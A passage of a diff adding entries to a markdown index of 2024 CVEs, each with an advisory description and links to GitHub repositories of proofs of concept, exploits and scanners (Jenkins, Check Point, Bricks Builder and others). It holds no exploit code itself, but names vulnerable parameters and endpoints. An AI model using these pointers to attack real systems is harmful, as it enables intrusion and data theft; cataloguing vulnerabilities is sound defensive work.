+The YI Smart Kami Vision com.kamivision.yismart application through 1.0.0_20231219 for Android allows a remote attacker to execute arbitrary JavaScript code via an implicit intent to the com.ants360.yicamera.activity.WebViewActivity component.
+
+
+- [actuator/yi](https://github.com/actuator/yi)
+
+### CVE-2024-23738 (2024-01-28)
+
+An issue in Postman version 10.22 and before on macOS allows a remote attacker to execute arbitrary code via the RunAsNode and enableNodeClilnspectArguments settings. NOTE: the vendor states "we dispute the report's accuracy ... the configuration does not enable remote code execution.."
+
+
+- [giovannipajeu1/CVE-2024-23738](https://github.com/giovannipajeu1/CVE-2024-23738)
+
+### CVE-2024-23739 (2024-01-28)
+
+An issue in Discord for macOS version 0.0.291 and before, allows remote attackers to execute arbitrary code via the RunAsNode and enableNodeClilnspectArguments settings.
+
+
+- [giovannipajeu1/CVE-2024-23739](https://github.com/giovannipajeu1/CVE-2024-23739)
+
+### CVE-2024-23740 (2024-01-28)
+
+An issue in Kap for macOS version 3.6.0 and before, allows remote attackers to execute arbitrary code via the RunAsNode and enableNodeClilnspectArguments settings.
+
+
+- [giovannipajeu1/CVE-2024-23740](https://github.com/giovannipajeu1/CVE-2024-23740)
+
+### CVE-2024-23741 (2024-01-28)
+
+An issue in Hyper on macOS version 3.4.1 and before, allows remote attackers to execute arbitrary code via the RunAsNode and enableNodeClilnspectArguments settings.
+
+
+- [giovannipajeu1/CVE-2024-23741](https://github.com/giovannipajeu1/CVE-2024-23741)
+
+### CVE-2024-23742 (2024-01-28)
+
+An issue in Loom on macOS version 0.196.1 and before, allows remote attackers to execute arbitrary code via the RunAsNode and enableNodeClilnspectArguments settings. NOTE: the vendor disputes this because it requires local access to a victim's machine.
+
+
+- [giovannipajeu1/CVE-2024-23742](https://github.com/giovannipajeu1/CVE-2024-23742)
+
+### CVE-2024-23743 (2024-01-28)
+
+Notion through 3.1.0 on macOS might allow code execution because of RunAsNode and enableNodeClilnspectArguments. NOTE: the vendor states "the attacker must launch the Notion Desktop application with nonstandard flags that turn the Electron-based application into a Node.js execution environment."
+
+
+- [giovannipajeu1/CVE-2024-23743](https://github.com/giovannipajeu1/CVE-2024-23743)
+
+### CVE-2024-23745 (2024-01-31)
+
+In Notion Web Clipper 1.0.3(7), a .nib file is susceptible to the Dirty NIB attack. NIB files can be manipulated to execute arbitrary commands. Additionally, even if a NIB file is modified within an application, Gatekeeper may still permit the execution of the application, enabling the execution of arbitrary commands within the application's context. NOTE: the vendor's perspective is that this is simply an instance of CVE-2022-48505, cannot properly be categorized as a product-level vulnerability, and cannot have a product-level fix because it is about incorrect caching of file signatures on macOS.
+
+
+- [louiselalanne/CVE-2024-23745](https://github.com/louiselalanne/CVE-2024-23745)
+
+### CVE-2024-23746 (2024-02-02)
+
+Miro Desktop 0.8.18 on macOS allows local Electron code injection via a complex series of steps that might be usable in some environments (bypass a kTCCServiceSystemPolicyAppBundles requirement via a file copy, an app.app/Contents rename, an asar modification, and a rename back to app.app/Contents).
+
+
+- [louiselalanne/CVE-2024-23746](https://github.com/louiselalanne/CVE-2024-23746)
+
+### CVE-2024-23747 (2024-01-29)
+
+The Moderna Sistemas ModernaNet Hospital Management System 2024 is susceptible to an Insecure Direct Object Reference (IDOR) vulnerability. This vulnerability resides in the system's handling of user data access through a /Modernanet/LAUDO/LAU0000100/Laudo?id= URI. By manipulating this id parameter, an attacker can gain access to sensitive medical information.
+
+
+- [louiselalanne/CVE-2024-23747](https://github.com/louiselalanne/CVE-2024-23747)
+
+### CVE-2024-23772 (2024-04-30)
+
+An issue was discovered in Quest KACE Agent for Windows 12.0.38 and 13.1.23.0. An Arbitrary file create vulnerability exists in the KSchedulerSvc.exe, KUserAlert.exe, and Runkbot.exe components. This allows local attackers to create any file of their choice with NT Authority\SYSTEM privileges.
+
+
+- [Verrideo/CVE-2024-23772](https://github.com/Verrideo/CVE-2024-23772)
+
+### CVE-2024-23773 (2024-04-30)
+
+An issue was discovered in Quest KACE Agent for Windows 12.0.38 and 13.1.23.0. An Arbitrary file delete vulnerability exists in the KSchedulerSvc.exe component. Local attackers can delete any file of their choice with NT Authority\SYSTEM privileges.
+
+
+- [Verrideo/CVE-2024-23773](https://github.com/Verrideo/CVE-2024-23773)
+
+### CVE-2024-23774 (2024-04-30)
+
+An issue was discovered in Quest KACE Agent for Windows 12.0.38 and 13.1.23.0. An unquoted Windows search path vulnerability exists in the KSchedulerSvc.exe and AMPTools.exe components. This allows local attackers to execute code of their choice with NT Authority\SYSTEM privileges.
+
+
+- [Verrideo/CVE-2024-23774](https://github.com/Verrideo/CVE-2024-23774)
+
+### CVE-2024-23780
+- [HazardLab-IO/CVE-2024-23780](https://github.com/HazardLab-IO/CVE-2024-23780)
+
+### CVE-2024-23897 (2024-01-24)
+
+Jenkins 2.441 and earlier, LTS 2.426.2 and earlier does not disable a feature of its CLI command parser that replaces an '@' character followed by a file path in an argument with the file's contents, allowing unauthenticated attackers to read arbitrary files on the Jenkins controller file system.
+
+
+- [jenkinsci-cert/SECURITY-3314-3315](https://github.com/jenkinsci-cert/SECURITY-3314-3315)
+- [binganao/CVE-2024-23897](https://github.com/binganao/CVE-2024-23897)
+- [h4x0r-dz/CVE-2024-23897](https://github.com/h4x0r-dz/CVE-2024-23897)
+- [xaitax/CVE-2024-23897](https://github.com/xaitax/CVE-2024-23897)
+- [vmtyan/poc-cve-2024-23897](https://github.com/vmtyan/poc-cve-2024-23897)
+- [yoryio/CVE-2024-23897](https://github.com/yoryio/CVE-2024-23897)
+- [3yujw7njai/CVE-2024-23897](https://github.com/3yujw7njai/CVE-2024-23897)
+- [10T4/PoC-Fix-jenkins-rce_CVE-2024-23897](https://github.com/10T4/PoC-Fix-jenkins-rce_CVE-2024-23897)
+- [wjlin0/CVE-2024-23897](https://github.com/wjlin0/CVE-2024-23897)
+- [Vozec/CVE-2024-23897](https://github.com/Vozec/CVE-2024-23897)
+- [raheel0x01/CVE-2024-23897](https://github.com/raheel0x01/CVE-2024-23897)
+- [viszsec/CVE-2024-23897](https://github.com/viszsec/CVE-2024-23897)
+- [jopraveen/CVE-2024-23897](https://github.com/jopraveen/CVE-2024-23897)
+- [AbraXa5/Jenkins-CVE-2024-23897](https://github.com/AbraXa5/Jenkins-CVE-2024-23897)
+- [brijne/CVE-2024-23897-RCE](https://github.com/brijne/CVE-2024-23897-RCE)
+- [WLXQqwer/Jenkins-CVE-2024-23897-](https://github.com/WLXQqwer/Jenkins-CVE-2024-23897-)
+- [kaanatmacaa/CVE-2024-23897](https://github.com/kaanatmacaa/CVE-2024-23897)
+- [Praison001/CVE-2024-23897-Jenkins-Arbitrary-Read-File-Vulnerability](https://github.com/Praison001/CVE-2024-23897-Jenkins-Arbitrary-Read-File-Vulnerability)
+- [B4CK4TT4CK/CVE-2024-23897](https://github.com/B4CK4TT4CK/CVE-2024-23897)
+- [godylockz/CVE-2024-23897](https://github.com/godylockz/CVE-2024-23897)
+- [ifconfig-me/CVE-2024-23897](https://github.com/ifconfig-me/CVE-2024-23897)
+- [ThatNotEasy/CVE-2024-23897](https://github.com/ThatNotEasy/CVE-2024-23897)
+- [pulentoski/CVE-2024-23897-Arbitrary-file-read](https://github.com/pulentoski/CVE-2024-23897-Arbitrary-file-read)
+- [Nebian/CVE-2024-23897](https://github.com/Nebian/CVE-2024-23897)
+- [Abo5/CVE-2024-23897](https://github.com/Abo5/CVE-2024-23897)
+- [Athulya666/CVE-2024-23897](https://github.com/Athulya666/CVE-2024-23897)
+- [murataydemir/CVE-2024-23897](https://github.com/murataydemir/CVE-2024-23897)
+- [mil4ne/CVE-2024-23897-Jenkins-4.441](https://github.com/mil4ne/CVE-2024-23897-Jenkins-4.441)
+- [Maalfer/CVE-2024-23897](https://github.com/Maalfer/CVE-2024-23897)
+- [Surko888/Surko-Exploit-Jenkins-CVE-2024-23897](https://github.com/Surko888/Surko-Exploit-Jenkins-CVE-2024-23897)
+
+### CVE-2024-24034 (2024-02-08)
+
+Setor Informatica S.I.L version 3.0 is vulnerable to Open Redirect via the hprinter parameter, allows remote attackers to execute arbitrary code.
+
+
+- [ELIZEUOPAIN/CVE-2024-24034](https://github.com/ELIZEUOPAIN/CVE-2024-24034)
+
+### CVE-2024-24035 (2024-03-07)
+
+Cross Site Scripting (XSS) vulnerability in Setor Informatica SIL 3.1 allows attackers to run arbitrary code via the hmessage parameter.
+
+
+- [ELIZEUOPAIN/CVE-2024-24035](https://github.com/ELIZEUOPAIN/CVE-2024-24035)
+
+### CVE-2024-24134 (2024-01-29)
+
+Sourcecodester Online Food Menu 1.0 is vulnerable to Cross Site Scripting (XSS) via the 'Menu Name' and 'Description' fields in the Update Menu section.
+
+
+- [BurakSevben/CVE-2024-24134](https://github.com/BurakSevben/CVE-2024-24134)
+
+### CVE-2024-24135 (2024-01-29)
+
+Product Name and Product Code in the 'Add Product' section of Sourcecodester Product Inventory with Export to Excel 1.0 are vulnerable to XSS attacks.
+
+
+- [BurakSevben/CVE-2024-24135](https://github.com/BurakSevben/CVE-2024-24135)
+
+### CVE-2024-24136 (2024-01-29)
+
+The 'Your Name' field in the Submit Score section of Sourcecodester Math Game with Leaderboard v1.0 is vulnerable to Cross-Site Scripting (XSS) attacks.
+
+
+- [BurakSevben/CVE-2024-24136](https://github.com/BurakSevben/CVE-2024-24136)
+
+### CVE-2024-24137
+- [BurakSevben/CVE-2024-24137](https://github.com/BurakSevben/CVE-2024-24137)
+
+### CVE-2024-24138
+- [BurakSevben/CVE-2024-24138](https://github.com/BurakSevben/CVE-2024-24138)
+
+### CVE-2024-24139 (2024-01-29)
+
+Sourcecodester Login System with Email Verification 1.0 allows SQL Injection via the 'user' parameter.
+
+
+- [BurakSevben/CVE-2024-24139](https://github.com/BurakSevben/CVE-2024-24139)
+
+### CVE-2024-24140 (2024-01-29)
+
+Sourcecodester Daily Habit Tracker App 1.0 allows SQL Injection via the parameter 'tracker.'
+
+
+- [BurakSevben/CVE-2024-24140](https://github.com/BurakSevben/CVE-2024-24140)
+
+### CVE-2024-24141 (2024-01-29)
+
+Sourcecodester School Task Manager App 1.0 allows SQL Injection via the 'task' parameter.
+
+
+- [BurakSevben/CVE-2024-24141](https://github.com/BurakSevben/CVE-2024-24141)
+
+### CVE-2024-24142 (2024-02-13)
+
+Sourcecodester School Task Manager 1.0 allows SQL Injection via the 'subject' parameter.
+
+
+- [BurakSevben/CVE-2024-24142](https://github.com/BurakSevben/CVE-2024-24142)
+
+### CVE-2024-24336 (2024-03-19)
+
+A multiple Cross-site scripting (XSS) vulnerability in the '/members/moremember.pl', and ‘/members/members-home.pl’ endpoints within Koha Library Management System version 23.05.05 and earlier allows malicious staff users to carry out CSRF attacks, including unauthorized changes to usernames and passwords of users visiting the affected page, via the 'Circulation note' and ‘Patrons Restriction’ components.
+
+
+- [nitipoom-jar/CVE-2024-24336](https://github.com/nitipoom-jar/CVE-2024-24336)
+
+### CVE-2024-24337 (2024-02-12)
+
+CSV Injection vulnerability in '/members/moremember.pl' and '/admin/aqbudgets.pl' endpoints in Koha Library Management System version 23.05.05 and earlier allows attackers to to inject DDE commands into csv exports via the 'Budget' and 'Patrons Member' components.
+
+
+- [nitipoom-jar/CVE-2024-24337](https://github.com/nitipoom-jar/CVE-2024-24337)
+
+### CVE-2024-24386 (2024-02-15)
+
+An issue in VitalPBX v.3.2.4-5 allows an attacker to execute arbitrary code via a crafted payload to the /var/lib/vitalpbx/scripts folder.
+
+
+- [erick-duarte/CVE-2024-24386](https://github.com/erick-duarte/CVE-2024-24386)
+
+### CVE-2024-24396 (2024-02-05)
+
+Cross Site Scripting vulnerability in Stimulsoft GmbH Stimulsoft Dashboard.JS before v.2024.1.2 allows a remote attacker to execute arbitrary code via a crafted payload to the search bar component.
+
+
+- [trustcves/CVE-2024-24396](https://github.com/trustcves/CVE-2024-24396)
+
+### CVE-2024-24397 (2024-02-05)
+
+Cross Site Scripting vulnerability in Stimulsoft GmbH Stimulsoft Dashboard.JS before v.2024.1.2 allows a remote attacker to execute arbitrary code via a crafted payload to the ReportName field.
+
+
+- [trustcves/CVE-2024-24397](https://github.com/trustcves/CVE-2024-24397)
+
+### CVE-2024-24398 (2024-02-06)
+
+Directory Traversal vulnerability in Stimulsoft GmbH Stimulsoft Dashboard.JS before v.2024.1.2 allows a remote attacker to execute arbitrary code via a crafted payload to the fileName parameter of the Save function.
+
+
+- [trustcves/CVE-2024-24398](https://github.com/trustcves/CVE-2024-24398)
+
+### CVE-2024-24401 (2024-02-26)
+
+SQL Injection vulnerability in Nagios XI 2024R1.01 allows a remote attacker to execute arbitrary code via a crafted payload to the monitoringwizard.php component.
+
+
+- [MAWK0235/CVE-2024-24401](https://github.com/MAWK0235/CVE-2024-24401)
+
+### CVE-2024-24402 (2024-02-26)
+
+An issue in Nagios XI 2024R1.01 allows a remote attacker to escalate privileges via a crafted script to the /usr/local/nagios/bin/npcd component.
+
+
+- [MAWK0235/CVE-2024-24402](https://github.com/MAWK0235/CVE-2024-24402)
+
+### CVE-2024-24409
+- [passtheticket/CVE-2024-24409](https://github.com/passtheticket/CVE-2024-24409)
+
+### CVE-2024-24488 (2024-02-07)
+
+An issue in Shenzen Tenda Technology CP3V2.0 V11.10.00.2311090948 allows a local attacker to obtain sensitive information via the password component.
+
+
+- [minj-ae/CVE-2024-24488](https://github.com/minj-ae/CVE-2024-24488)
+
+### CVE-2024-24520 (2024-02-29)
+
+An issue in Lepton CMS v.7.0.0 allows a local attacker to execute arbitrary code via the upgrade.php file in the languages place.
+
+
+- [xF-9979/CVE-2024-24520](https://github.com/xF-9979/CVE-2024-24520)
+
+### CVE-2024-24576 (2024-04-09)
+
+Rust is a programming language. The Rust Security Response WG was notified that the Rust standard library prior to version 1.77.2 did not properly escape arguments when invoking batch files (with the `bat` and `cmd` extensions) on Windows using the `Command`. An attacker able to control the arguments passed to the spawned process could execute arbitrary shell commands by bypassing the escaping. The severity of this vulnerability is critical for those who invoke batch files on Windows with untrusted arguments. No other platform or use is affected.\n\nThe `Command::arg` and `Command::args` APIs state in their documentation that the arguments will be passed to the spawned process as-is, regardless of the content of the arguments, and will not be evaluated by a shell. This means it should be safe to pass untrusted input as an argument.\n\nOn Windows, the implementation of this is more complex than other platforms, because the Windows API only provides a single string containing all the arguments to the spawned process, and it's up to the spawned process to split them. Most programs use the standard C run-time argv, which in practice results in a mostly consistent way arguments are splitted.\n\nOne exception though is `cmd.exe` (used among other things to execute batch files), which has its own argument splitting logic. That forces the standard library to implement custom escaping for arguments passed to batch files. Unfortunately it was reported that our escaping logic was not thorough enough, and it was possible to pass malicious arguments that would result in arbitrary shell execution.\n\nDue to the complexity of `cmd.exe`, we didn't identify a solution that would correctly escape arguments in all cases. To maintain our API guarantees, we improved the robustness of the escaping code, and changed the `Command` API to return an `InvalidInput` error when it cannot safely escape an argument. This error will be emitted when spawning the process.\n\nThe fix is included in Rust 1.77.2. Note that the new escaping logic for batch files errs on the conservative side, and could reject valid arguments. Those who implement the escaping themselves or only handle trusted inputs on Windows can also use the `CommandExt::raw_arg` method to bypass the standard library's escaping logic.
+
+
+- [frostb1ten/CVE-2024-24576-PoC](https://github.com/frostb1ten/CVE-2024-24576-PoC)
+- [brains93/CVE-2024-24576-PoC-Python](https://github.com/brains93/CVE-2024-24576-PoC-Python)
+- [aydinnyunus/CVE-2024-24576-Exploit](https://github.com/aydinnyunus/CVE-2024-24576-Exploit)
+- [foxoman/CVE-2024-24576-PoC---Nim](https://github.com/foxoman/CVE-2024-24576-PoC---Nim)
+- [corysabol/batbadbut-demo](https://github.com/corysabol/batbadbut-demo)
+- [mishalhossin/CVE-2024-24576-PoC-Python](https://github.com/mishalhossin/CVE-2024-24576-PoC-Python)
+- [lpn/CVE-2024-24576.jl](https://github.com/lpn/CVE-2024-24576.jl)
+- [Gaurav1020/CVE-2024-24576-PoC-Rust](https://github.com/Gaurav1020/CVE-2024-24576-PoC-Rust)
+- [SheL3G/CVE-2024-24576-PoC-BatBadBut](https://github.com/SheL3G/CVE-2024-24576-PoC-BatBadBut)
+
+### CVE-2024-24590 (2024-02-06)
+
+Deserialization of untrusted data can occur in versions 0.17.0 to 1.14.2 of the client SDK of Allegro AI’s ClearML platform, enabling a maliciously uploaded artifact to run arbitrary code on an end user’s system when interacted with.\n
+
+
+- [LordVileOnX/ClearML-vulnerability-exploit-RCE-2024-CVE-2024-24590-](https://github.com/LordVileOnX/ClearML-vulnerability-exploit-RCE-2024-CVE-2024-24590-)
+- [OxyDeV2/ClearML-CVE-2024-24590](https://github.com/OxyDeV2/ClearML-CVE-2024-24590)
+- [DemonPandaz2763/CVE-2024-24590](https://github.com/DemonPandaz2763/CVE-2024-24590)
+- [xffsec/CVE-2024-24590-ClearML-RCE-Exploit](https://github.com/xffsec/CVE-2024-24590-ClearML-RCE-Exploit)
+- [diegogarciayala/CVE-2024-24590-ClearML-RCE-CMD-POC](https://github.com/diegogarciayala/CVE-2024-24590-ClearML-RCE-CMD-POC)
+- [junnythemarksman/CVE-2024-24590](https://github.com/junnythemarksman/CVE-2024-24590)
+
+### CVE-2024-24760 (2024-02-02)
+
+mailcow is a dockerized email package, with multiple containers linked in one bridged network. A security vulnerability has been identified in mailcow affecting versions < 2024-01c. This vulnerability potentially allows attackers on the same subnet to connect to exposed ports of a Docker container, even when the port is bound to 127.0.0.1. The vulnerability has been addressed by implementing additional iptables/nftables rules. These rules drop packets for Docker containers on ports 3306, 6379, 8983, and 12345, where the input interface is not `br-mailcow` and the output interface is `br-mailcow`.
+
+
+- [killerbees19/CVE-2024-24760](https://github.com/killerbees19/CVE-2024-24760)
+
+### CVE-2024-24787 (2024-05-08)
+
+On Darwin, building a Go module which contains CGO can trigger arbitrary code execution when using the Apple version of ld, due to usage of the -lto_library flag in a "#cgo LDFLAGS" directive.
+
+
+- [LOURC0D3/CVE-2024-24787-PoC](https://github.com/LOURC0D3/CVE-2024-24787-PoC)
+
+### CVE-2024-24816 (2024-02-07)
+
+CKEditor4 is an open source what-you-see-is-what-you-get HTML editor. A cross-site scripting vulnerability vulnerability has been discovered in versions prior to 4.24.0-lts in samples that use the `preview` feature. All integrators that use these samples in the production code can be affected. The vulnerability allows an attacker to execute JavaScript code by abusing the misconfigured preview feature. It affects all users using the CKEditor 4 at version < 4.24.0-lts with affected samples used in a production environment. A fix is available in version 4.24.0-lts.
+
+
+- [afine-com/CVE-2024-24816](https://github.com/afine-com/CVE-2024-24816)
+
+### CVE-2024-24919 (2024-05-28)
+
+Potentially allowing an attacker to read certain information on Check Point Security Gateways once connected to the internet and enabled with remote Access VPN or Mobile Access Software Blades. A Security fix that mitigates this vulnerability is available.
+
+
+- [c3rrberu5/CVE-2024-24919](https://github.com/c3rrberu5/CVE-2024-24919)
+- [emanueldosreis/CVE-2024-24919](https://github.com/emanueldosreis/CVE-2024-24919)
+- [hendprw/CVE-2024-24919](https://github.com/hendprw/CVE-2024-24919)
+- [LucasKatashi/CVE-2024-24919](https://github.com/LucasKatashi/CVE-2024-24919)
+- [eoslvs/CVE-2024-24919](https://github.com/eoslvs/CVE-2024-24919)
+- [Bytenull00/CVE-2024-24919](https://github.com/Bytenull00/CVE-2024-24919)
+- [am-eid/CVE-2024-24919](https://github.com/am-eid/CVE-2024-24919)
+- [P3wc0/CVE-2024-24919](https://github.com/P3wc0/CVE-2024-24919)
+- [zam89/CVE-2024-24919](https://github.com/zam89/CVE-2024-24919)
+- [satriarizka/CVE-2024-24919](https://github.com/satriarizka/CVE-2024-24919)
+- [3UR/CVE-2024-24919](https://github.com/3UR/CVE-2024-24919)
+- [RevoltSecurities/CVE-2024-24919](https://github.com/RevoltSecurities/CVE-2024-24919)
+- [Vulnpire/CVE-2024-24919](https://github.com/Vulnpire/CVE-2024-24919)
+- [seed1337/CVE-2024-24919-POC](https://github.com/seed1337/CVE-2024-24919-POC)
+- [0x3f3c/CVE-2024-24919](https://github.com/0x3f3c/CVE-2024-24919)
+- [Praison001/CVE-2024-24919-Check-Point-Remote-Access-VPN](https://github.com/Praison001/CVE-2024-24919-Check-Point-Remote-Access-VPN)
+- [smackerdodi/CVE-2024-24919-nuclei-templater](https://github.com/smackerdodi/CVE-2024-24919-nuclei-templater)
+- [GoatSecurity/CVE-2024-24919](https://github.com/GoatSecurity/CVE-2024-24919)
+- [GlobalsecureAcademy/CVE-2024-24919](https://github.com/GlobalsecureAcademy/CVE-2024-24919)
+- [nexblade12/CVE-2024-24919](https://github.com/nexblade12/CVE-2024-24919)
+- [un9nplayer/CVE-2024-24919](https://github.com/un9nplayer/CVE-2024-24919)
+- [MohamedWagdy7/CVE-2024-24919](https://github.com/MohamedWagdy7/CVE-2024-24919)
+- [Cappricio-Securities/CVE-2024-24919](https://github.com/Cappricio-Securities/CVE-2024-24919)
+- [fernandobortotti/CVE-2024-24919](https://github.com/fernandobortotti/CVE-2024-24919)
+- [nicolvsrlr27/CVE-2024-24919](https://github.com/nicolvsrlr27/CVE-2024-24919)
+- [gurudattch/CVE-2024-24919](https://github.com/gurudattch/CVE-2024-24919)
+- [YN1337/CVE-2024-24919](https://github.com/YN1337/CVE-2024-24919)
+- [ifconfig-me/CVE-2024-24919-Bulk-Scanner](https://github.com/ifconfig-me/CVE-2024-24919-Bulk-Scanner)
+- [r4p3c4/CVE-2024-24919-Checkpoint-Firewall-VPN-Check](https://github.com/r4p3c4/CVE-2024-24919-Checkpoint-Firewall-VPN-Check)
+- [r4p3c4/CVE-2024-24919-Exploit-PoC-Checkpoint-Firewall-VPN](https://github.com/r4p3c4/CVE-2024-24919-Exploit-PoC-Checkpoint-Firewall-VPN)
+- [J4F9S5D2Q7/CVE-2024-24919-CHECKPOINT](https://github.com/J4F9S5D2Q7/CVE-2024-24919-CHECKPOINT)
+- [mr-kasim-mehar/CVE-2024-24919-Exploit](https://github.com/mr-kasim-mehar/CVE-2024-24919-Exploit)
+- [B1naryo/CVE-2024-24919-POC](https://github.com/B1naryo/CVE-2024-24919-POC)
+- [Expl0itD0g/CVE-2024-24919---Poc](https://github.com/Expl0itD0g/CVE-2024-24919---Poc)
+- [bigb0x/CVE-2024-24919-Sniper](https://github.com/bigb0x/CVE-2024-24919-Sniper)
+- [birdlex/cve-2024-24919-checker](https://github.com/birdlex/cve-2024-24919-checker)
+- [Rug4lo/CVE-2024-24919-Exploit](https://github.com/Rug4lo/CVE-2024-24919-Exploit)
+- [0nin0hanz0/CVE-2024-24919-PoC](https://github.com/0nin0hanz0/CVE-2024-24919-PoC)
+- [GuayoyoCyber/CVE-2024-24919](https://github.com/GuayoyoCyber/CVE-2024-24919)
+- [0xans/CVE-2024-24919](https://github.com/0xans/CVE-2024-24919)
+- [Tim-Hoekstra/CVE-2024-24919](https://github.com/Tim-Hoekstra/CVE-2024-24919)
+- [starlox0/CVE-2024-24919-POC](https://github.com/starlox0/CVE-2024-24919-POC)
+- [nullcult/CVE-2024-24919-Exploit](https://github.com/nullcult/CVE-2024-24919-Exploit)
+- [satchhacker/cve-2024-24919](https://github.com/satchhacker/cve-2024-24919)
+- [verylazytech/CVE-2024-24919](https://github.com/verylazytech/CVE-2024-24919)
+- [protonnegativo/CVE-2024-24919](https://github.com/protonnegativo/CVE-2024-24919)
+- [SalehLardhi/CVE-2024-24919](https://github.com/SalehLardhi/CVE-2024-24919)
+
+### CVE-2024-25092 (2024-06-09)
+
+Missing Authorization vulnerability in XLPlugins NextMove Lite.This issue affects NextMove Lite: from n/a through 2.17.0.
+
+
+- [RandomRobbieBF/CVE-2024-25092](https://github.com/RandomRobbieBF/CVE-2024-25092)
+
+### CVE-2024-25153 (2024-03-13)
+
+A directory traversal within the ‘ftpservlet’ of the FileCatalyst Workflow Web Portal allows files to be uploaded outside of the intended ‘uploadtemp’ directory with a specially crafted POST request. In situations where a file is successfully uploaded to web portal’s DocumentRoot, specially crafted JSP files could be used to execute code, including web shells.
+
+
+- [nettitude/CVE-2024-25153](https://github.com/nettitude/CVE-2024-25153)
+- [rainbowhatrkn/CVE-2024-25153](https://github.com/rainbowhatrkn/CVE-2024-25153)
+
+### CVE-2024-25169 (2024-02-28)
+
+An issue in Mezzanine v6.0.0 allows attackers to bypass access control mechanisms in the admin panel via a crafted request.
+
+
+- [shenhav12/CVE-2024-25169-Mezzanine-v6.0.0](https://github.com/shenhav12/CVE-2024-25169-Mezzanine-v6.0.0)
+
+### CVE-2024-25170 (2024-02-28)
+
+An issue in Mezzanine v6.0.0 allows attackers to bypass access controls via manipulating the Host header.
+
+
+- [shenhav12/CVE-2024-25170-Mezzanine-v6.0.0](https://github.com/shenhav12/CVE-2024-25170-Mezzanine-v6.0.0)
+
+### CVE-2024-25175 (2024-03-25)
+
+An issue in Kickdler before v1.107.0 allows attackers to provide an XSS payload via a HTTP response splitting attack.
+
+
+- [jet-pentest/CVE-2024-25175](https://github.com/jet-pentest/CVE-2024-25175)
+
+### CVE-2024-25202 (2024-02-28)
+
+Cross Site Scripting vulnerability in Phpgurukul User Registration & Login and User Management System 1.0 allows attackers to run arbitrary code via the search bar.
+
+
+- [Agampreet-Singh/CVE-2024-25202](https://github.com/Agampreet-Singh/CVE-2024-25202)
+
+### CVE-2024-25227 (2024-03-15)
+
+SQL Injection vulnerability in ABO.CMS version 5.8, allows remote attackers to execute arbitrary code, cause a denial of service (DoS), escalate privileges, and obtain sensitive information via the tb_login parameter in admin login page.
+
+
+- [thetrueartist/ABO.CMS-Login-SQLi-CVE-2024-25227](https://github.com/thetrueartist/ABO.CMS-Login-SQLi-CVE-2024-25227)
+- [thetrueartist/ABO.CMS-EXPLOIT-Unauthenticated-Login-Bypass-CVE-2024-25227](https://github.com/thetrueartist/ABO.CMS-EXPLOIT-Unauthenticated-Login-Bypass-CVE-2024-25227)
+
+### CVE-2024-25270
+- [fbkcs/CVE-2024-25270](https://github.com/fbkcs/CVE-2024-25270)
+
+### CVE-2024-25277
+- [maen08/CVE-2024-25277](https://github.com/maen08/CVE-2024-25277)
+
+### CVE-2024-25278
+- [sajaljat/CVE-2024-25278](https://github.com/sajaljat/CVE-2024-25278)
+
+### CVE-2024-25279
+- [sajaljat/CVE-2024-25279](https://github.com/sajaljat/CVE-2024-25279)
+
+### CVE-2024-25280
+- [sajaljat/CVE-2024-25280](https://github.com/sajaljat/CVE-2024-25280)
+
+### CVE-2024-25281
+- [sajaljat/CVE-2024-25281](https://github.com/sajaljat/CVE-2024-25281)
+
+### CVE-2024-25376 (2024-04-11)
+
+An issue discovered in Thesycon Software Solutions Gmbh & Co. KG TUSBAudio MSI-based installers before 5.68.0 allows a local attacker to execute arbitrary code via the msiexec.exe repair mode.
+
+
+- [ewilded/CVE-2024-25376-POC](https://github.com/ewilded/CVE-2024-25376-POC)
+
+### CVE-2024-25381 (2024-02-21)
+
+There is a Stored XSS Vulnerability in Emlog Pro 2.2.8 Article Publishing, due to non-filtering of quoted content.
+
+
+- [Ox130e07d/CVE-2024-25381](https://github.com/Ox130e07d/CVE-2024-25381)
+
+### CVE-2024-25423 (2024-02-22)
+
+An issue in MAXON CINEMA 4D R2024.2.0 allows a local attacker to execute arbitrary code via a crafted c4d_base.xdl64 file.
+
+
+- [DriverUnload/cve-2024-25423](https://github.com/DriverUnload/cve-2024-25423)
+
+### CVE-2024-25466 (2024-02-16)
+
+Directory Traversal vulnerability in React Native Document Picker before v.9.1.1 and fixed in v.9.1.1 allows a local attacker to execute arbitrary code via a crafted script to the Android library component.
+
+
+- [FixedOctocat/CVE-2024-25466](https://github.com/FixedOctocat/CVE-2024-25466)
+
+### CVE-2024-25600 (2024-06-04)
+
+Improper Control of Generation of Code ('Code Injection') vulnerability in Codeer Limited Bricks Builder allows Code Injection.This issue affects Bricks Builder: from n/a through 1.9.6.
+
+
+- [Chocapikk/CVE-2024-25600](https://github.com/Chocapikk/CVE-2024-25600)
+- [Christbowel/CVE-2024-25600_Nuclei-Template](https://github.com/Christbowel/CVE-2024-25600_Nuclei-Template)
+- [Tornad0007/CVE-2024-25600-Bricks-Builder-plugin-for-WordPress](https://github.com/Tornad0007/CVE-2024-25600-Bricks-Builder-plugin-for-WordPress)
+- [hy011121/CVE-2024-25600-wordpress-Exploit-RCE](https://github.com/hy011121/CVE-2024-25600-wordpress-Exploit-RCE)
+- [K3ysTr0K3R/CVE-2024-25600-EXPLOIT](https://github.com/K3ysTr0K3R/CVE-2024-25600-EXPLOIT)
+- [X-Projetion/WORDPRESS-CVE-2024-25600-EXPLOIT-RCE](https://github.com/X-Projetion/WORDPRESS-CVE-2024-25600-EXPLOIT-RCE)
+- [RHYru9/CVE-2024-25600-mass](https://github.com/RHYru9/CVE-2024-25600-mass)
+- [ivanbg2004/0BL1V10N-CVE-2024-25600-Bricks-Builder-plugin-for-WordPress](https://github.com/ivanbg2004/0BL1V10N-CVE-2024-25600-Bricks-Builder-plugin-for-WordPress)
+- [k3lpi3b4nsh33/CVE-2024-25600](https://github.com/k3lpi3b4nsh33/CVE-2024-25600)
+- [WanLiChangChengWanLiChang/CVE-2024-25600](https://github.com/WanLiChangChengWanLiChang/CVE-2024-25600)
+
+### CVE-2024-25723 (2024-02-27)
+
+ZenML Server in the ZenML machine learning package before 0.46.7 for Python allows remote privilege escalation because the /api/v1/users/{user_name_or_id}/activate REST API endpoint allows access on the basis of a valid username along with a new password in the request body. These are also patched versions: 0.44.4, 0.43.1, and 0.42.2.
+
+
+- [david-botelho-mariano/exploit-CVE-2024-25723](https://github.com/david-botelho-mariano/exploit-CVE-2024-25723)
+
+### CVE-2024-25731 (2024-03-04)
+
+The Elink Smart eSmartCam (com.cn.dq.ipc) application 2.1.5 for Android contains hardcoded AES encryption keys that can be extracted from a binary file. Thus, encryption can be defeated by an attacker who can observe packet data (e.g., over Wi-Fi).
+
+
